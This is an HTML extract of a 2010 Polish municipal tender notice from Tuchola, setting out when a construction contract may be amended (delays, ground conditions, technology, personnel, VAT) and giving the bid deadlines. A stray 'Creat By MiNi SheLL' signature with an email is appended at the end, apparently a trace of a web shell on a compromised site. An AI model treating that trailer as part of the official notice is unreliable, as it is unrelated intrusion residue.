<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w następujących sytuacjach:
1.	Nieterminowe przekazanie terenu budowy.
2.	Braki lub wady w dokumentacji projektowej lub innych dokumentach budowy. 
3.	Opóźnienia w zakresie dokonywania odbiorów lub prób końcowych. 
4.	Wyjątkowo niesprzyjające i nieprzewidziane warunki fizyczne. 
5.	Nieprzewidziane wykopaliska.
6.	Zawieszenie przez zamawiającego wykonania robót lub ich części.
7.	Wyjątkowo niepomyślne warunki klimatyczne.
8.	Epidemie, działania rządowe.
9.	Nieprzewidywalne braki możliwości zatrudnienia personelu lub uzyskania dostaw.
10.	Jakiekolwiek opóźnienia, utrudnienia lub przeszkody spowodowane przez lub dające się przypisać zamawiającemu, personelowi zamawiającego czy innemu wykonawcy, zatrudnionemu przez zamawiającego na terenie budowy. 
11.	Zmiana jakości lub innych parametrów charakterystycznych dla danego elementu robót budowlanych lub zmiana technologii.
12.	Aktualizacja rozwiązań z uwagi na postęp technologiczny lub zmiany obowiązujących przepisów.
13.	Zmiana producenta urządzeń lub wyposażenia.
14.	Zmiana wymiarów, położenia lub wysokości części robót.
15.	Rezygnacja z części robót.
16.	Zmiany w kolejności i terminach wykonywania robót budowlanych.
17.	Zmiany kluczowego personelu wykonawcy lub zamawiającego.
18.	Zmiany podwykonawców.
19.	Waloryzacja wynagrodzenia.
20.	Zwiększenie stawki podatku VAT.
Zamawiający przewiduje możliwość zmian postanowień zawartej umowy z uwzględnieniem podanych warunków ich wprowadzenia:
1.	Zmiana terminu realizacji przedmiotu umowy
Zmiany spowodowane warunkami atmosferycznymi w szczególności:
a)	klęski żywiołowe,
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzania prób i sprawdzeń, dokonywanie odbiorów.
Zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi, w szczególności:
a)	niewypały i niewybuchy,
b)	wykopaliska archeologiczne nieprzewidywane w siwz,
c)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategorie gruntu, kurzawka itp.),
d)	 odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych.
Zmiany będące następstwem okoliczności leżących po stronie zamawiającego, w szczególności:
a)	wstrzymanie robót przez zamawiającego,
b)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej.
Zmiany będące następstwem działania organów administracji, w szczególności:
a)	przekroczenie zakreślonych przez prawo terminów wydawania przez organ administracji decyzji, zezwoleń itp.,
b)	odmowa wydania przez organ administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej.
Inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy skutkujące niemożliwością prowadzenia prac.
W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt 1-5 termin wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
2.	Zmiana sposobu spełnienia świadczenia
Zmiany technologiczne, w szczególności:
a)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji projektowej w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
b)	odmienne od przyjętych w dokumentacji projektowej warunki geologiczne (kategoria gruntu, kurzawka itp.) skutkujące niemożliwością zrealizowania przedmiotu umowy przy dotychczasowych założeniach technologicznych,
c)	odmienne od przyjętych w dokumentacji projektowej warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
d)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa.
Zmiany, o których mowa w lit. b-c, mogą być wprowadzone w sytuacjach odpowiadających przesłankom do udzielenia zamówień dodatkowych oraz w innych sytuacjach, jednakże w tym ostatnim przypadku zamawiający nie zgodzi na zwiększenie wynagrodzenia, gdy przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych.
Zmiany wskazywane w lit. d będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom.
Każda ze wskazanych w lit. a-d zmian może być powiązana z obniżeniem wynagrodzenia na zasadach określonych przez strony.
Zmiany osobowe
Zmiana osób, przy pomocy których wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami,             o których mowa w ustawie Prawo budowlane lub innych ustawach, a także w siwz, również będzie wymagała zaakceptowania przez zamawiającego.
3.	Pozostałe zmiany
Zmiana obowiązującej stawki VAT:
a)	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie wykonawcy, zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie w kwocie podatku VAT zapłaconego przez wykonawcę,
b)	jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie wykonawcy, zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez wykonawcę,
c)	rezygnacja przez zamawiającego z realizacji części przedmiotu umowy - w takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami,
d)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami - w takim przypadku zmiany w umowie zostaną ograniczone   do zmian koniecznych powodujących uniknięcie kolizji, zmiany uzasadnione okolicznościami, o których mowa w art. 357 kc  z uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 ksh.   

Wykonawca nie będzie uprawniony do żadnego przedłużenia terminu wykonania umowy i zwiększenia wynagrodzenia, jeżeli zmiana jest wymuszona uchybieniem czy naruszeniem umowy przez wykonawcę; w takim przypadku koszty dodatkowe związane z takimi zmianami ponosi wykonawca.
Dokonanie zmian, o których mowa wyżej wymaga podpisania aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miasto.tuchola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
pl. Zamkowy 1
89-500 Tuchola.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2010 godzina 10:00, miejsce: Urząd Miejski
pl. Zamkowy 1
89-500 Tuchola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com